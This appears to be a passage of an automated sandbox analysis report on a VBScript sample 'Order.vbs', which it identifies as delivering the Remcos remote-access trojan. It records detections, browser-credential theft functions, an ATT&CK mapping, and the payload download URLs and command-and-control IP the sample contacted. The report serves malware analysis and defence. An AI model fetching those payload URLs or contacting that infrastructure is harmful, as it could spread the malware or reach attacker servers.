              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00413BCC GetLocalTime,8_2_00413BCC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00413CEA CreateThread,GetComputerNameExW,GetUserNameW,8_2_00413CEA
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000008.00000002.3509300667.0000000000DC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7436, type: MEMORYSTR
              Contains functionality to steal Chrome passwords or cookies
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data8_2_00407EC0
              Contains functionality to steal Firefox passwords or cookies
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\8_2_00407FDE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \key3.db8_2_00407FDE

              Remote Access Functionality

              barindex
              Detected Remcos RAT
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-MBKA6AJump to behavior
              Yara detected Remcos RAT
              Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000008.00000002.3509300667.0000000000DC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7436, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: cmd.exe8_2_00403B0B

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information221
              Scripting              		Valid Accounts11
              Windows Management Instrumentation              		221
              Scripting              		1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		1
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services11
              Archive Collected Data              		12
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts1
              Native API              		1
              DLL Side-Loading              		1
              Access Token Manipulation              		3
              Obfuscated Files or Information              		2
              Credentials In Files              		1
              Account Discovery              		Remote Desktop Protocol3
              Clipboard Data              		21
              Encrypted Channel              		Exfiltration Over Bluetooth1
              Defacement
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution              		1
              Windows Service              		1
              Windows Service              		1
              Software Packing              		Security Account Manager1
              System Service Discovery              		SMB/Windows Admin SharesData from Network Shared Drive1
              Non-Standard Port              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts3
              Command and Scripting Interpreter              		Login Hook212
              Process Injection              		1
              DLL Side-Loading              		NTDS3
              File and Directory Discovery              		Distributed Component Object ModelInput Capture1
              Remote Access Software              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud Accounts2
              Service Execution              		Network Logon ScriptNetwork Logon Script11
              Masquerading              		LSA Secrets44
              System Information Discovery              		SSHKeylogging2
              Non-Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable Media2
              PowerShell              		RC ScriptsRC Scripts41
              Virtualization/Sandbox Evasion              		Cached Domain Credentials41
              Security Software Discovery              		VNCGUI Input Capture13
              Application Layer Protocol              		Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Access Token Manipulation              		DCSync41
              Virtualization/Sandbox Evasion              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job212
              Process Injection              		Proc Filesystem3
              Process Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
              Application Window Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
              System Owner/User Discovery              		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1538690 Sample: Order.vbs Startdate: 21/10/2024 Architecture: WINDOWS Score: 100 31 s3-w.us-east-1.amazonaws.com 2->31 33 raw.githubusercontent.com 2->33 35 7 other IPs or domains 2->35 55 Suricata IDS alerts for network traffic 2->55 57 Found malware configuration 2->57 59 Malicious sample detected (through community Yara rule) 2->59 61 11 other signatures 2->61 10 wscript.exe 1 2->10         started        13 svchost.exe 1 1 2->13         started        signatures3 process4 dnsIp5 69 VBScript performs obfuscated calls to suspicious functions 10->69 71 Suspicious powershell command line found 10->71 73 Wscript starts Powershell (via cmd or directly) 10->73 75 2 other signatures 10->75 16 powershell.exe 7 10->16         started        47 127.0.0.1 unknown unknown 13->47 signatures6 process7 signatures8 49 Suspicious powershell command line found 16->49 51 Suspicious execution chain found 16->51 53 Found suspicious powershell code related to unpacking or dynamic code loading 16->53 19 powershell.exe 14 25 16->19         started        23 conhost.exe 16->23         started        process9 dnsIp10 37 raw.githubusercontent.com 185.199.108.133, 443, 49789 FASTLYUS Netherlands 19->37 39 bitbucket.org 185.166.143.48, 443, 49758 AMAZON-02US Germany 19->39 41 s3-w.us-east-1.amazonaws.com 52.217.161.161, 443, 49764 AMAZON-02US United States 19->41 63 Writes to foreign memory regions 19->63 65 Injects a PE file into a foreign processes 19->65 67 Loading BitLocker PowerShell Module 19->67 25 RegAsm.exe 2 14 19->25         started        signatures11 process12 dnsIp13 43 154.216.17.141, 49805, 5922 SKHT-ASShenzhenKatherineHengTechnologyInformationCo Seychelles 25->43 45 geoplugin.net 178.237.33.50, 49812, 80 ATOM86-ASATOM86NL Netherlands 25->45 77 Detected Remcos RAT 25->77 79 Contains functionalty to change the wallpaper 25->79 81 Contains functionality to steal Chrome passwords or cookies 25->81 83 2 other signatures 25->83 29 conhost.exe 25->29         started        signatures14 process15

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Order.vbs13%ReversingLabs

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://aka.ms/winsvr-2022-pshelp0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://g.live.com/odclientsettings/ProdV21C:0%URL Reputationsafe
              https://aka.ms/pscore60%URL Reputationsafe
              http://go.micros0%URL Reputationsafe
              http://geoplugin.net/json.gp0%URL Reputationsafe
              https://g.live.com/odclientsettings/Prod1C:0%URL Reputationsafe
              http://geoplugin.net/json.gp/C0%URL Reputationsafe
              http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              s3-w.us-east-1.amazonaws.com
              		52.217.161.161
              		truetrue
                		unknown
                bitbucket.org
                		185.166.143.48
                		truetrue
                  		unknown
                  bg.microsoft.map.fastly.net
                  		199.232.214.172
                  		truefalse
                    		unknown
                    raw.githubusercontent.com
                    		185.199.108.133
                    		truetrue
                      		unknown
                      geoplugin.net
                      		178.237.33.50
                      		truefalse
                        		unknown
                        ax-0001.ax-msedge.net
                        		150.171.28.10
                        		truefalse
                          		unknown
                          bbuseruploads.s3.amazonaws.com
                          		unknown
                          		unknowntrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://geoplugin.net/json.gpfalse
                            • URL Reputation: safe
                            		unknown
                            https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417true
                              		unknown
                              https://raw.githubusercontent.com/IJEUWAESIKA/skyapb/refs/heads/main/kgpmmrd.txttrue
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000006.00000002.2379283237.000001F504260000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2379283237.000001F505256000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2379283237.000001F50527C000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://geoplugin.net/json.gp(cZRegAsm.exe, 00000008.00000002.3509300667.0000000000DC5000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://bbuseruploads.s3.amazonaws.compowershell.exe, 00000006.00000002.2379283237.000001F5003FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.2379283237.000001F500222000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000006.00000002.2379283237.000001F504260000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.2379283237.000001F500222000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://go.micropowershell.exe, 00000006.00000002.2379283237.000001F5055F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2379283237.000001F5045C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2379283237.000001F505933000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://web-security-reports.services.atlassian.com/csp-report/bb-websitepowershell.exe, 00000006.00000002.2379283237.000001F5003F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 00000006.00000002.2379283237.000001F505256000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2379283237.000001F50527C000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/powershell.exe, 00000006.00000002.2379283237.000001F5003F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 0000000C.00000003.2433659954.0000011BAF600000.00000004.00000800.00020000.00000000.sdmp, edb.log.12.drfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://crl.ver)svchost.exe, 0000000C.00000002.3508659507.0000011BAF400000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://aka.ms/pscore6powershell.exe, 00000003.00000002.2679834341.0000028186F29000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://geoplugin.net/json.gp6RegAsm.exe, 00000008.00000002.3509300667.0000000000DC5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://go.microspowershell.exe, 00000006.00000002.2379283237.000001F505933000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://dz8aopenkvv6s.cloudfront.netpowershell.exe, 00000006.00000002.2379283237.000001F5003F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.2379283237.000001F500222000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://geoplugin.net/json.gpSystem32RegAsm.exe, 00000008.00000002.3509300667.0000000000DC5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://g.live.com/odclientsettings/Prod1C:edb.log.12.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://raw.githubusercontent.compowershell.exe, 00000006.00000002.2379283237.000001F504026000.00000004.00000800.00020000.00000000.sdmptrue
                                                        		unknown
                                                        http://geoplugin.net/json.gp/CRegAsm.exe, 00000008.00000002.3506159201.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
